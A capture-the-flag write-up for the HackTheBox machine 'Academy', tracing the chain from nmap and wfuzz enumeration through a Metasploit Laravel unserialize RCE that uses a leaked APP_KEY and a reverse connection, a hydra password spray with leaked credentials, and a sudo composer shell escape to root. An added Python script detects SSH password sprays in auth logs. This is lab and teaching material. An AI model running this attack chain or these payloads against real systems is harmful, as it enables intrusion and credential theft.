Academy-HackTheBox
Hey, this is a write-up for the machine ‘Academy’ on HackTheBox.
I started by enumerating the target with nmap, using the following commands:
nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.215
nmap -p 22,80,33060 -sC -sV 10.10.10.215
This found three open ports (22, 80 and 33060). Since port 80 was open I paid it a visit. The website redirected to academy.htb, so I added that hostname for 10.10.10.215 to /etc/hosts.
Whenever I visit a website during a CTF I have Burp Suite set up to monitor the requests. On the home page there are two buttons, ‘LOGIN’ and ‘REGISTER’.
I clicked on ‘LOGIN’ and tried some default credentials, but nothing worked. I also checked the source of the login page but found nothing interesting. Then I registered myself and logged in.
I spent a lot of time analysing the site and found nothing. Then I started viewing the page source of every single page and finally found a hidden input field on the registration page.
I opened the Inspect Element tab, changed the input type to text and its value to 1, and registered another user called ‘boy’.
Nothing visibly happened; I could just log in. But there was something odd about that input tag, so I used wfuzz to fuzz for other pages with the following command:
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://academy.htb/FUZZ --hc 404
The fuzzing results pointed me to admin.php. I visited http://academy.htb/admin.php and tried logging in with default credentials and with the users I had created. The second user I created (the one registered with the hidden value set to 1) could successfully log in to the admin page.
The last row in the admin page's table mentions a web page with some issues, dev-staging-01.academy.htb. I added that hostname to my /etc/hosts as well and visited it.
This site shows a Laravel error page. Searching through the page I found some interesting variables, including the app_key and the database username and password.
I tried connecting to the database with those credentials but couldn’t establish a connection. Then I googled for Laravel vulnerabilities and found that some versions have a remote code execution vulnerability. I couldn’t determine the version used here, but I decided to give it a try anyway, opened msfconsole and used the following commands:
msfconsole
search laravel
use exploit/unix/http/laravel_token_unserialize_exec
show options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set rhosts 10.10.10.215
set vhost dev-staging-01.academy.htb
set lhost 10.10.14.31
run
After running the exploit I got a shell.
I upgraded to a more stable shell using Python's pty module with the following command:
python3 -c 'import pty; pty.spawn("/bin/sh")'
After looking through a lot of files I found a ‘.env’ file containing database credentials.
I still couldn’t connect to the database with them. After many tries I thought I might try this password against all the local users instead. Listing the /home directory gave me the following users:
I saved these names in users.txt and the password ‘mySup3rP4s5w0rd!!’ in another file, password.txt, then ran hydra with the following command:
hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh
Hydra found that the password worked for cry0l1t3. After logging in over SSH, I got the user.txt flag.
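From the defender's side, the hydra step above is a password spray: one leaked credential tried against every account found in /home. As an added example (not part of the original write-up), this Python script parses constructed sshd auth.log lines and flags a source host that fails logins for several distinct users within a short window, noting any accepted login that follows; the usernames other than cry0l1t3 and mrb3n, the timestamps and the thresholds are made-up assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in /var/log/auth.log format (not from the
# real machine): one password tried against several accounts from one host.
SAMPLE_LOG = """\
Nov 10 12:00:01 academy sshd[2101]: Failed password for invalid user alice from 10.10.14.31 port 50122 ssh2
Nov 10 12:00:02 academy sshd[2103]: Failed password for bob from 10.10.14.31 port 50124 ssh2
Nov 10 12:00:03 academy sshd[2105]: Failed password for mrb3n from 10.10.14.31 port 50126 ssh2
Nov 10 12:00:04 academy sshd[2107]: Accepted password for cry0l1t3 from 10.10.14.31 port 50128 ssh2
Nov 10 12:30:00 academy sshd[2300]: Failed password for bob from 192.168.1.20 port 41000 ssh2
Nov 10 12:31:00 academy sshd[2301]: Accepted password for bob from 192.168.1.20 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse_auth_log(text):
    """Yield (timestamp, result, user, src) for each sshd password event.
    Syslog timestamps carry no year; only their relative order matters here."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_password_spray(text, window_seconds=300, min_users=3):
    """Return {src: {"users": [...], "followed_by_success": user_or_None}} for each
    source failing logins for >= min_users distinct accounts inside window_seconds."""
    by_src = defaultdict(list)
    for ev in parse_auth_log(text):
        by_src[ev[3]].append(ev)
    alerts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e[0])
        failures = [e for e in events if e[1] == "Failed"]
        for i, first in enumerate(failures):
            span = [e for e in failures[i:]
                    if (e[0] - first[0]).total_seconds() <= window_seconds]
            users = sorted({e[2] for e in span})
            if len(users) >= min_users:
                # An accepted login after the spray is the strongest signal.
                success = next((e[2] for e in events
                                if e[1] == "Accepted" and e[0] >= first[0]), None)
                alerts[src] = {"users": users, "followed_by_success": success}
                break
    return alerts
```

The single failure from 192.168.1.20 is an ordinary mistyped password and is not flagged, while the spray from 10.10.14.31 is reported together with the account it eventually succeeded on.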
Privilege Escalation
After logging in as cry0l1t3, I couldn’t read the root flag. I checked almost everything that might contain a password for root or similar, but found nothing. So I copied linpeas.sh from my local machine to the Academy machine. Linux Privilege Escalation Awesome Script (LinPEAS) is a script that looks for different ways to escalate privileges. I copied it with the following command:
scp linpeas.sh cry0l1t3@academy.htb:/tmp
I entered the password for cry0l1t3, changed to /tmp on the target and ran ./linpeas.sh. It gave me the following output:
Based on that output, I tried switching to ‘mrb3n’ with the password ‘mrb3n_Ac@d3my!’ and got access. The first thing I did was try to read root.txt, but I still didn’t have permission. Then I ran ‘sudo -l’ to see the sudo permissions and found this:
I found that mrb3n could run composer with sudo. I googled for ways to abuse this and got the following results:
I visited that site and ran the following commands as ‘mrb3n’, as described there:
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
This gave me a root shell, and I could read root.txt from /root. Happy hacking, and thanks for reading.